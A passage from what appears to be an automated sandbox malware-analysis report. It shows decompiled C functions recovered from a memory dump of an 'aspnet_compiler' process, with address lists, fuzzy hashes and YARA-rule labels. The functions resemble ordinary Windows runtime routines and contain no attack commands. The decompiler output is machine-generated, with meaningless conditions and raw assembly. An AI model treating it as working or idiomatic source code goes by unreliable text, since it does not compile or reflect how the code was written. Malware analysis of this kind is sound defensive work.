											L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E012895D0();
											L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0125EB70(_t93, 0x13379a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E012895D0();
										L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E012895D0();
										L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0127F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x012452a5
0x012452ad
0x012452b0
0x012452b3
0x012452b7
0x012452ba
0x012452bf
0x012452c4
0x012452cc
0x00000000
0x00000000
0x012452ce
0x012452d9
0x012452dd
0x012452e7
0x012452f7
0x012452f9
0x012452fd
0x012a0dcf
0x012a0dd5
0x012a0dd6
0x012a0dd7
0x012a0dd8
0x012a0dd9
0x012a0dde
0x012a0ddf
0x012a0de0
0x012a0de1
0x012a0de2
0x012a0de5
0x012a0dea
0x012a0dec
0x012a0f60
0x012a0f64
0x012a0f70
0x012a0f76
0x012a0f79
0x012a0f79
0x00000000
0x012a0f64
0x012a0df2
0x012a0df7
0x012a0e04
0x012a0e0d
0x012a0e0d
0x012a0e10
0x012a0e1a
0x012a0e1c
0x012a0e4c
0x012a0e52
0x012a0e61
0x012a0e67
0x012a0e6b
0x012a0e70
0x012a0e76
0x012a0ed7
0x012a0edc
0x012a0ee0
0x012a0ee6
0x012a0eea
0x012a0eed
0x012a0ef0
0x012a0ef3
0x012a0ef6
0x012a0ef9
0x012a0efe
0x012a0f01
0x012a0f01
0x012a0f0b
0x012a0f12
0x012a0f16
0x012a0f18
0x012a0f1b
0x012a0f2c
0x012a0f31
0x012a0f31
0x012a0f35
0x012a0f39
0x012a0f3a
0x012a0f3c
0x012a0f3f
0x012a0f50
0x012a0f55
0x012a0f55
0x012a0f59
0x012452eb
0x012452f1
0x012452f1
0x012a0e7d
0x012a0e84
0x012a0e88
0x012a0e8a
0x012a0e8d
0x012a0e9e
0x012a0ea3
0x012a0ea3
0x012a0ea7
0x012a0eaf
0x012a0eb3
0x012a0eb9
0x012a0eb9
0x012a0ebc
0x012a0ecd
0x012a0ecd
0x00000000
0x012a0eb3
0x012a0e21
0x012a0e2b
0x012a0e2f
0x012a0e30
0x012a0e3a
0x012a0e3f
0x012a0e41
0x00000000
0x00000000
0x012a0e47
0x00000000
0x012a0e47
0x012a0df9
0x012a0dfe
0x00000000
0x00000000
0x00000000
0x012a0dfe
0x01245303
0x01245307
0x00000000
0x01245309
0x00000000
0x01245309
0x01245307
0x012452e9
0x012452e9
0x00000000
0x012452e9
0x0124530e
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbd01c30ced0492f76852e5d9d53b27ef13aa8af312b7f1d9945841479151b05
Instruction ID: bbb51cdf404d24d5a16756317cdc4e3d5093e601f6378fa5080a87838de0d956
Opcode Fuzzy Hash: dbd01c30ced0492f76852e5d9d53b27ef13aa8af312b7f1d9945841479151b05
Instruction Fuzzy Hash: 1351EE71225742AFD722EF28C941B2BBBE8FF90714F10091EF59587691E774E840CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 01272AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01272AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1338204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1338208; // 0x1338207
				_t8 = _t57 + 0x1338208; // 0x1338207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1338450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x133821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1336d5c; // 0x7fe50654
							_t72 =  *0x1336d5c; // 0x7fe50654
							_t75 =  *0x1336d5c; // 0x7fe50654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1336d5c; // 0x7fe50654
							_t84 =  *0x1336d5c; // 0x7fe50654
							_t87 =  *0x1336d5c; // 0x7fe50654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0128F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x01272ae4
0x01272aec
0x01272aef
0x01272af4
0x01272af7
0x01272afd
0x01272b92
0x01272b92
0x01272b97
0x01272b9c
0x01272b9c
0x01272b03
0x01272b06
0x01272b09
0x01272b09
0x01272b0f
0x01272b15
0x01272b15
0x01272b1b
0x01272b1e
0x01272b21
0x01272b26
0x01272b29
0x01272b81
0x01272b84
0x01272c0e
0x01272c15
0x01272c24
0x01272c24
0x01272b8a
0x01272b8a
0x01272b8a
0x01272b8a
0x01272b90
0x00000000
0x00000000
0x00000000
0x00000000
0x01272b4a
0x01272b4a
0x01272b4d
0x01272b53
0x00000000
0x00000000
0x01272b55
0x01272b58
0x01272bb7
0x012b5d1b
0x012b5d37
0x012b5d47
0x012b5d53
0x01272bbd
0x01272bbd
0x01272bbd
0x01272bb7
0x01272b5d
0x01272c2f
0x012b5d5b
0x012b5d77
0x012b5d87
0x012b5d93
0x01272c35
0x01272c35
0x01272c35
0x01272c2f
0x01272b65
0x01272b9f
0x01272ba2
0x01272b67
0x01272b67
0x01272b69
0x01272b6b
0x01272b6e
0x01272bc9
0x01272bcc
0x01272bcf
0x01272bd4
0x01272bd6
0x01272bd6
0x01272bdb
0x01272c02
0x01272c05
0x01272c07
0x00000000
0x01272c07
0x01272be0
0x01272c00
0x01272c3f
0x01272c3f
0x00000000
0x01272c00
0x01272be5
0x01272be7
0x01272bec
0x01272bf4
0x01272bf6
0x00000000
0x01272bf6
0x01272b70
0x01272b76
0x01272b2b
0x01272b2b
0x01272b2d
0x01272b2f
0x01272b32
0x01272b35
0x01272b3a
0x00000000
0x01272b40
0x01272b43
0x01272b45
0x01272b47
0x01272b4a
0x01272b4d
0x01272b53
0x00000000
0x00000000
0x00000000
0x01272b53
0x01272b78
0x01272b78
0x01272b7b
0x01272b7e
0x00000000
0x01272b7e
0x01272b76
0x01272ba5
0x01272ba5
0x01272ba8
0x01272bad
0x00000000
0x00000000
0x01272baf
0x01272baf
0x01272bc2
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0019b4da83197c47d6bd203f80a20c5390031e5ed512f231f71ea14d59423a43
Instruction ID: 5bcb35114e3ed10245c15bf67569c1fc820b27c7cd17029071402453b7aecef7
Opcode Fuzzy Hash: 0019b4da83197c47d6bd203f80a20c5390031e5ed512f231f71ea14d59423a43
Instruction Fuzzy Hash: 8E510676B20116CFCB14CF1CC891ABEB7F5FB98700B06855AE946EB355E730AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0130AE44 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0130AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0130C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0130ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0130FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0130EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E01267D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01301608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01311536(0x1338ae4, (_t74 -  *0x1338b04 >> 0x14) + (_t74 -  *0x1338b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0130C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0130A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E012ECB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0130ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0130ae44
0x0130ae4c
0x0130ae53
0x0130ae55
0x0130ae5c
0x0130ae64
0x0130ae68
0x0130ae75
0x0130ae75
0x0130ae78
0x0130ae7a
0x0130ae7c
0x0130ae7f
0x0130aea8
0x0130aeab
0x0130aead
0x00000000
0x00000000
0x0130aeb3
0x0130aeb8
0x0130aebb
0x0130aebd
0x00000000
0x0130ae81
0x0130ae88
0x0130ae8f
0x0130ae9b
0x0130ae96
0x0130ae96
0x0130ae96
0x0130aea0
0x0130aea3
0x0130aebf
0x0130aebf
0x0130aec3
0x0130aec9
0x0130af0d
0x0130af14
0x0130af3d
0x0130af3d
0x0130af41
0x0130af44
0x0130af67
0x0130af67
0x0130af6a
0x0130afca
0x0130afd1
0x00000000
0x0130afd1
0x0130af6c
0x0130af6d
0x0130af75
0x0130af7c
0x0130af7e
0x0130af80
0x0130af85
0x0130af87
0x0130af99
0x0130af89
0x0130af92
0x0130af92
0x0130af9e
0x0130afa1
0x0130afa3
0x0130afa9
0x0130afb0
0x0130afb2
0x0130afb4
0x0130afbc
0x0130afbc
0x0130afb4
0x0130afb0
0x00000000
0x0130afa1
0x0130af4f
0x0130af57
0x0130af5c
0x0130af5e
0x00000000
0x00000000
0x0130af60
0x0130af64
0x0130af64
0x00000000
0x0130af64
0x0130af1a
0x0130af25
0x00000000
0x00000000
0x0130af27
0x0130af28
0x0130af33
0x00000000
0x0130aed0
0x0130aed0
0x0130aed2
0x0130aee1
0x0130aee4
0x00000000
0x00000000
0x0130aee6
0x0130aeec
0x00000000
0x00000000
0x0130aefb
0x0130af07
0x0130afd3
0x0130afdb
0x0130afdb
0x00000000
0x0130af07
0x0130aed6
0x0130aed8
0x0130aedf
0x00000000
0x00000000
0x00000000
0x0130aedf
0x0130aec9

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cb24b3f3b45950308dcdb5feffa9bd2a7f0baf2b9b125f622f982b163162ee0
Instruction ID: ae88305ffb0eae4709af702490648dd96647a691469a9577c7fcb7159f3da9be
Opcode Fuzzy Hash: 6cb24b3f3b45950308dcdb5feffa9bd2a7f0baf2b9b125f622f982b163162ee0
Instruction Fuzzy Hash: 2741E5B17043119BE727DA2DECA4B3BBBDAAF94628F04421DF95A8B2D0D734D805C691

Uniqueness

Uniqueness Score: -1.00%

Function 0126DBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0126DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0124CC50(E01244510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01267D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01318ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01262280(_t58, _v44);
						E0126DD82(_v44, _t102, _t98);
						E0126B944(_t102, _v5);
						return E0125FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1338628; // 0x0
							_v28 = _t67;
							_t68 =  *0x133862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1338628; // 0x0
						_t105 = _v28;
						_t80 =  *0x133862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x130fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0126dbe9
0x0126dbf2
0x0126dbf7
0x0126dbf9
0x0126dbfc
0x0126dc00
0x0126dc03
0x0126dc14
0x0126dd54
0x0126dd54
0x0126dd54
0x0126dc18
0x0126dc1d
0x0126dc1d
0x0126dc32
0x0126dc3b
0x0126dc3e
0x0126dc46
0x0126dd5b
0x0126dd62
0x0126dd64
0x0126dd67
0x0126dd69
0x0126dd6b
0x0126dd6e
0x0126dd70
0x0126dd73
0x0126dd73
0x00000000
0x0126dc4c
0x0126dc4e
0x012b3ae3
0x012b3ae8
0x012b3aea
0x0126dce7
0x0126dce9
0x0126dcec
0x0126dcee
0x0126dcf0
0x0126dcf3
0x0126dcf5
0x012b3af2
0x012b3af5
0x012b3af5
0x0126dd06
0x0126dd08
0x0126dd0b
0x0126dd12
0x012b3b08
0x0126dd18
0x0126dd18
0x0126dd18
0x0126dd20
0x0126dd23
0x012b3b16
0x012b3b16
0x0126dd29
0x0126dd2d
0x0126dd36
0x0126dd40
0x0126dd51
0x0126dd51
0x0126dc54
0x0126dc59
0x0126dc59
0x0126dc5e
0x0126dc5e
0x0126dc63
0x0126dc66
0x0126dc6b
0x0126dc78
0x0126dc7b
0x0126dc81
0x0126dc81
0x0126dc83
0x0126dc89
0x00000000
0x00000000
0x0126dd7b
0x0126dd7b
0x0126dc8f
0x0126dc8f
0x0126dc92
0x0126dc99
0x0126dc9f
0x0126dca5
0x0126dcaa
0x0126dcaa
0x0126dcb3
0x0126dcb8
0x0126dcbb
0x0126dcc1
0x0126dccf
0x0126dcd2
0x0126dcd5
0x0126dcd7
0x0126dcda
0x0126dcdc
0x0126dcdc
0x0126dce2
0x0126dce4
0x00000000
0x0126dce4

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1e4a765044eacc289ae52d8184cc16b6b72131ed896da0cfcd5754a6fa6c63e
Instruction ID: da53aceef27fa0615b338b23c8d491403dc453c2fc9cddfcfc5e193dbeca05b2
Opcode Fuzzy Hash: f1e4a765044eacc289ae52d8184cc16b6b72131ed896da0cfcd5754a6fa6c63e
Instruction Fuzzy Hash: 90519172B1161ECFCB14DFA8C4806AEBBF9BB58350F208159D695E7384DB70A984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0125EF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0125EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E01249080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7729c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E01242D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0125ef4b
0x0125ef4d
0x0125ef57
0x0125f0bd
0x0125f0c2
0x0125f0d2
0x0125f0d2
0x0125f0c2
0x0125ef5d
0x0125ef5f
0x0125ef67
0x0125ef6a
0x0125ef6d
0x0125ef74
0x0125ef7f
0x0125ef82
0x0125ef82
0x0125ef86
0x0125ef88
0x0125ef8c
0x0125ef8f
0x0125ef8f
0x0125ef8f
0x00000000
0x0125ef91
0x0125ef93
0x0125efc4
0x0125efc4
0x0125efc4
0x0125efca
0x0125efd0
0x0125f0a6
0x00000000
0x00000000
0x0125f0af
0x012abb06
0x012abb0a
0x0125f0b5
0x0125f0b5
0x0125f0b5
0x0125f0b5
0x00000000
0x0125efd6
0x0125efd9
0x0125f0de
0x0125f0e2
0x0125efdf
0x0125efdf
0x0125efdf
0x0125efe5
0x012abafc
0x012abafc
0x0125efe5
0x0125efeb
0x0125efed
0x0125f00f
